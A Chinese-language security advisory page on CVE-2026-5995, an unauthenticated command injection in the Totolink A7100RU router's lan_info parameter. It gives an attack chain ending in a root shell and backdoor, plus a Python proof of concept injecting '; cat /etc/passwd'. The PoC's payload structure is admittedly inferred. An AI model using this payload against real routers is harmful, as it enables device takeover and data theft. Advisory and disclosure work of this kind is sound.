IPBUF安全漏洞报告
English
CVE-2026-5995 CVSS 9.8 严重

CVE-2026-5995 Totolink A7100RU远程命令执行漏洞

披露日期: 2026-04-10

漏洞信息

漏洞编号
CVE-2026-5995
漏洞类型
操作系统命令注入
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Totolink A7100RU

相关标签

RCE命令注入TotolinkIoT路由器CVE-2026-5995

漏洞概述

Totolink A7100RU路由器7.4cu.2313_b20191024版本存在严重的操作系统命令注入漏洞。由于CGI接口未正确过滤用户输入,远程攻击者无需认证即可通过构造恶意请求,利用`lan_info`参数在系统后台执行任意命令,完全控制设备。

技术细节

该漏洞位于Totolink A7100RU的Web服务器组件中,具体影响`/cgi-bin/cstecgi.cgi`脚本内的`setMiniuiHomeInfoShow`函数。该函数负责处理网络配置信息,但在接收`lan_info`参数时,未能对特殊字符进行过滤或转义,直接将其拼接到系统命令中执行。根据CVSS 3.1评分向量(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H),该漏洞利用难度低且无需用户交互。攻击者只需向目标设备发送特制的HTTP POST数据包,在`lan_info`字段中注入Shell元字符(如`;`或`` ` ``),即可欺骗操作系统执行恶意指令。由于路由器服务通常以Root权限运行,此漏洞可能导致设备被完全接管。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出暴露在互联网上的Totolink A7100RU设备,并确认其Web管理接口是否开放。
STEP 2
2. 漏洞利用
攻击者向目标设备的/cgi-bin/cstecgi.cgi接口发送特制的HTTP POST请求,在参数`lan_info`中注入恶意的Shell命令。
STEP 3
3. 命令执行
由于后端未过滤特殊字符,服务器将注入的参数作为系统命令执行,攻击者获得设备Root权限的Shell。
STEP 4
4. 建立后门
攻击者修改系统配置,开启Telnet/SSH服务或添加恶意账户,建立持久化后门,以便后续控制。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Malicious payload to execute a command (e.g., 'cat /etc/passwd') # Note: The payload structure is inferred from typical CGI handlers in this device family. payload = { "function": "setMiniuiHomeInfoShow", "lan_info": "; cat /etc/passwd" } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-5995-Scanner)" } try: # Send POST request response = requests.post(target_url, json=payload, headers=headers, timeout=5) # Check response if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Totolink A7100RU 7.4cu.2313_b20191024

防御指南

临时缓解措施
若无法立即升级固件,建议用户禁用路由器的WAN侧远程Web管理功能,仅允许局域网内部访问管理界面。同时,应将路由器放置在防火墙之后,阻断非信任IP对内部网络的直接访问,以降低被自动化蠕虫攻击的风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表